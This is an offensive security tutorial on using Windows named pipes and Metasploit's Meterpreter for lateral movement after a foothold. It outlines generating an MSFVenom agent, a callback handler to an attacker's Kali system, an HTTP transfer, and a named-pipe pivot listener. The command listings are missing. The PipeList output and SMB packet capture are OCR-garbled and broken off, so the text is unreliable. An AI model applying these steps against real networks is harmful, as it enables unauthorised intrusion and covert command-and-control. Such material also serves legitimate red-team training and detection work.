Lateral Movement With Named Pipes

Once an initial foothold has been gained in a network, named pipes offer a stealthy method of moving laterally. A Named Pipe is a mechanism for inter-process communication.

You can view currently active Named Pipes using Sysinternals Pipelist (https://docs.microsoft.com/en-us/sysinternals/downloads/pipelist)

ipeList ul .02 — 
Lists open named pipes 
opyright (C) 2005—2016 Mark Russ inouich 
ys internals 
www . sys internals.com 
ipe Name 
In itShutdown 
Isass 
rote cted_storage 
tsucs 
cerpc 
lugplay 
in sock2 tener—2ac —g 
insock2 
pmapper 
SM_RPI _ seru ice 
vent log 
in sock2 
tsuc 
insock2 
kssuc 
eysuc 
pkwks 
insock2 t e nee—I d 
EUENT PROUIDER 
sFteWds 
BoxrrayIPC—aIice 
.356 
hrome .356 . g. 153430556 
hrome .356 .1 .1?0406398 
Instances 
Max 
Instances

Named pipes can also be accessed remotely using the SMB protocol.

Metasploit is able to use named pipes for remotely controlling other Meterpreter agents. As an example of how to do this, first generate a Meterpreter agent using MSFVenom:

Create an initial Meterpreter agent

Next, create a Metasploit handler to accept the connection back to attackers Kali system:

This file can be transferred to the target host over HTTP:

Configuring the Pipe Listener

With the Meterpreter agent executed on the first endpoint, we can then configure a pipe listener:

Generate a named pipe Meterpreter agent

When the payload executes on the target endpoint, you should be able to see staging over SMB:

19153 
1666.287797 
172.16.16.260 
172.16.16.19 
19154 
1666.585161 
172.16.16.200 
172.16.16.19 
19155 
1666.589081 
172.16.16.19 
172.16.16.200 
19156 
1666.799320 
172.16.16.260 
172.16.16.19 
19157 
1667.082598 
172.16.16.200 
172.16.16.19 
19158 
1667.082689 
172.16.16.19 
172.16.16.200 
19159 
1667.285383 
172.16.16.260 
172.16.16.19 
19160 
1667.598736 
172.16.16.200 
172.16.16.19 
19161 
1667.598822 
172.16.16.19 
172.16.16.200 
19162 
1667.799801 
172.16.16.260 
172.16.16.19 
19163 
1668.092511 
172.16.16.200 
172.16.16.19 
19164 
1668.101465 
172.16.16.19 
172.16.16.200 
τι:ρ 
SMB2 
SMB2 
τι:ρ 
SMB2 
SMB2 
τι:ρ 
SMB2 
SMB2 
τι:ρ 
SMB2 
SMB2 
60 49210 
Ioct1 
178 
Ioct1 
186 
60 49210 
Ioct1 
178 
Ioct1 
186 
60 49210 
Ioct1 
178 
Ioct1 
186 
60 49210 
Ioct1 
178 
Ioct1 
186 
445 [ACK] seq=5273 Ack=184754 win=65280 Len=o 
Request FSCTL ΡΙΡΕ PEEK Fi1e: bgpipe 
FSCTL ΡΙΡΕ PEEK Fi1e: bgpipe 
445 [ACK] seq=5397 Ack=184886 win=65024 Len=o 
Request FSCTL ΡΙΡΕ PEEK Fi1e: bgpipe 
FSCTL ΡΙΡΕ PEEK Fi1e: bgpipe 
445 [ACK] seq=5521 Ack=185018 win=65024 Len=o 
Request FSCTL ΡΙΡΕ PEEK Fi1e: bgpipe 
FSCTL ΡΙΡΕ PEEK Fi1e: bgpipe 
445 [ACK] seq=5645 Ack=185150 win=64768 Len=o 
Request FSCTL ΡΙΡΕ PEEK Fi1e: bgpipe 
FSCTL ΡΙΡΕ PEEK Fi1e: bgpipe

The new pivot session will then appear in msfconsole: